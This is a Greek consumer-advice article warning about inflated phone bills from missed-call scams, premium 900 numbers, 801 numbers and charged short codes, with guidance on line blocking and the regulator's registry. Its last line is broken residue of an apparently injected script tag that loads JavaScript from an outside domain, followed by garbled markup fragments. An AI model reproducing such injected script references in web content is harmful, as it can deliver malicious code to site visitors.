Σωθείτε από φουσκωμένους λογαριασμούς τηλεφώνου

Τετραψήφια, πενταψήφια, αναπάντητες κλήσεις, αριθμοί από 900 και άλλα πολλά, μας πονοκεφαλιάζουν και ενίοτε χρεώνουν υπέρογκα τους λογαριασμούς τηλεφώνου μας. Προστατευτείτε!

Μπορεί να σας έχει τύχει μπορεί και όχι. Μπορεί να είχατε ήδη την ατυχία να λάβετε λογαριασμό τηλεφώνου με αρκετά μηδενικά, μπορεί και όχι.

Μπορεί να έχετε πρόγραμμα με πάγιο που περιλαμβάνει δωρεάν απεριόριστα αστικά και υπεραστικά τηλεφωνήματα, αλλά παρόλα αυτά να βρίσκετε σημαντικές χρεώσεις στο λογαριασμό σας. Τέλος μπορεί να μην κάνατε τίποτα λάθος αλλά οι λογαριασμοί των τηλεπικοινωνιών σας να είναι τόσο παράξενα φουσκωμένοι που να θυμίζουν …ΔΕΗ!

Τι συμβαίνει: Πολλά και διάφορα που θα αναλύσουμε παρακάτω.

1. Οι απατεώνες – Το τηλέφωνο χτυπάει τη νύχτα και κλείνει (Κάτι θα συμβαίνει σκέφτεστε και καλείτε πίσω. Λάθος!)

Το σενάριο είναι γνωστό. Το τηλέφωνο, σταθερό ή κινητό, χτυπάει και πριν προλάβετε να απαντήσετε ή αμέσως μόλις το σηκώσετε, η γραμμή κλείνει. Δεν το πολυσκέφτεστε, βρίσκετε τη χαμένη κλήση και παίρνετε πίσω…

Αν είναι η γιαγιά από το χωριό ή ένας φίλος, έχει καλώς. Αν όμως ο αριθμός δεν είναι ένας κλασσικός σταθερός δεκαψήφιος αριθμός τύπου 210, 211 ή ένα κινητό που γνωρίζετε κλπ, καλύτερα να το σκεφτείτε διπλά πριν καλέσετε.

Οι απατεώνες δουλεύουν με πολλούς τρόπους. Σας καλούν από αριθμούς υψηλής χρέωσης και το κλείνουν ώστε να πάρετε πίσω και να χρεωθείτε με δεκάδες ευρώ ανά κλήση. Σας καλούν επίσης από πενταψήφια νούμερα με ακριβώς το ίδιο αποτέλεσμα. Κατά καιρούς έχουν δημοσιοποιηθεί πολλοί ύποπτοι αριθμοί ή προθέματα εξωτερικού που συνήθως προέρχονται από τη Λευκορωσία, τη Βουλγαρία κλπ. Δεν έχει καμία σημασία.

Οταν σας καλούν από αριθμό εσωτερικού ή εξωτερικού που δεν γνωρίζετε και το κλείνουν μην καλέσετε εσείς. Αν είναι από τράπεζα ή κάποιος άνθρωπος σας ψάχνει, θα ξανακαλέσει και θα περιμένει. Αν ο πλούσιος θείος από την Αμερική απεβίωσε και …περιμένετε την κληρονομιά και πάλι μην πάρετε πίσω. Μην ανησυχείτε, θα σας εντοπίσουν οι δικηγόροι του και δεν θα σας κλείσουν το τηλέφωνο!

2. Νούμερα από 800, 900 – Οι “Μη γεωγραφικοί αριθμοί” Με και Χωρίς χρέωση

Μία δεύτερη πηγή υψηλών χρεώσεων γίνεται από δική μας άγνοια και ίσως ελλειπή ενημέρωση και αφορά αριθμούς που ξεκινούν από 800, 900 κλπ.

Οι αριθμοί που ξεκινούν από 800, δεν έχουν χρέωση, οι αριθμοί όμως που ξεκινούν από 801 έχουν. Το μπέρδεμα είναι εύκολο για τον καταναλωτή! Η χρέωση είναι μία αστική μονάδα αλλά δεν συγκαταλέγεται στις δωρεάν κλήσεις των παγίων μας. Η λύση που μας καλύπτει δωρεάν σε αυτή την περίπτωση είναι να καλέσουμε το απλό σταθερό επικοινωνίας που πάντα υπάρχει δίπλα στο 801 ΧΧΧ ΧΧΧ.

Φυσικά, φτάνοντας σε αριθμούς που ξεκινούν από 900, η χρέωση αρχίζει και αυξάνεται γεωμετρικά αφού συνήθως τέτοια νούμερα αφορούν γραμμές για ενηλίκους, αστρολόγους κλπ. Η χρέωση μπορεί να φτάνει και τα 6 ευρώ ανά λεπτό και η κλήση διακόπτεται αυτόματα στα 20 λεπτά ή αλλιώς, κάθε κλήση σε τέτοιο αριθμό μπορεί και να ανέλθει σε 120 ευρώ!

Ευτυχώς, μπορείτε να απευθυνθείτε στον πάροχο τηλεπικοινωνιών σας και να κλειδώσετε τη γραμμή σας ώστε να μην μπορεί να πραγματοποιεί τέτοιες κλήσεις.

3. Οι σύντομοι κωδικοί – Η …διευκόλυνση χρεώνεται

Εκτός από την σπαζοκεφαλιά των αριθμών από 800, 801, 900, 901 κ.ο.κ, ο πολίτης έχει να αντιμετωπίσει και μία νέα κατηγορία αριθμών που μπορεί να έχουν ή να μην έχουν χρέωση. Αυτοί είναι οι πενταψήφιοι και τετραψήφιοι αριθμοί που έχουν δημιουργηθεί για την διευκόλυνσή σας φυσικά …χρεώνονται και δεν περιλαμβάνονται ούτε αυτοί στις δωρεάν κλήσεις του πακέτου σταθερή ή κινητής τηλεφωνίας σας. Ακόμα και η “αγαπημένη” μας ΔΕΗ, έχει δημιουργήσει το πενταψήφιο 11770 στο οποίο περιμένουμε με τις ώρες να απαντήσουν. Ισως δεν το έχετε σκεφτεί, αλλά αυτός ο αριθμός έχει χρέωση. Αστική μεν, αλλά έχει.

Για όλους τους υπόλοιπους παρόμοιους αριθμούς, η ανεύρεση του κόστους χρήσης είναι επιστήμη! Υπάρχουν τέτοιοι αριθμοί με χαμηλές χρεώσεις αλλά και κάποιοι με υψηλές χρεώσεις.

Τρόπος ελέγχου τις πραγματικής χρέωσης δεν υπάρχει. Καθώς όπως διαπιστώσαμε ύστερα από εκτεταμένη έρευνα σε τιμοκαταλόγους εταιριών, οι χρεώσεις αλλάζουν συχνά.

Ενας τέτοιος αριθμός λοιπόν, μπορεί να εμφανίζεται με χρέωση π.χ 0.9€/λεπτό σε κάποιο εντυπο η οποία όμως εν τω μεταξύ να έχει αλλάξει, μάλλον προς τα πάνω. Ο ιδιώτης το μόνο που μπορεί να κάνει, είναι να διαπιστώσει ότι την πάτησε… Η ΕΕΤΤ πάντως έχει ευτυχώς δημιουργήσει το μητρώο αυτών των αριθμών και των επιχειρήσεων που τις εκμεταλλεύονται. Πηγαίνοντας σε αυτή τη σελίδα,στην Εθνική Επιτροπή Τηλεπικοινωνιών και Ταχυδρομείων μπορείτε να εισάγετε τον αριθμό, να ανακαλύψετε ποιος δραστηριοποιείται πίσω από ένα τετραψήφιο ή πενταψήφιο νούμερο και να κινηθείτε αναλόγως.

Ολες οι χρεώσεις

Σας παραθέτουμε και μία μεγάλη λίστα με αρχεία των παρόχων τηλεπικοινωνιών στα οποία αναγράφονται αναλυτικά όλα αυτά τα παράξενα μικρά ή μεγάλα νούμερα και φυσικά οι χρεώσεις τους. Ανάλογα σε ποιον πάροχο είστε, μπορείτε τώρα ξέρε τι πληρώνετε, ακριβώς!

Ετσι, την επόμενη φορά που θα καλέσετε για να …ακούσετε την ώρα, επειδή έτσι έκανε η γιαγιά σας το 1960 (που ήταν δωρεάν) θα το σκεφτείτε διπλά!

challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >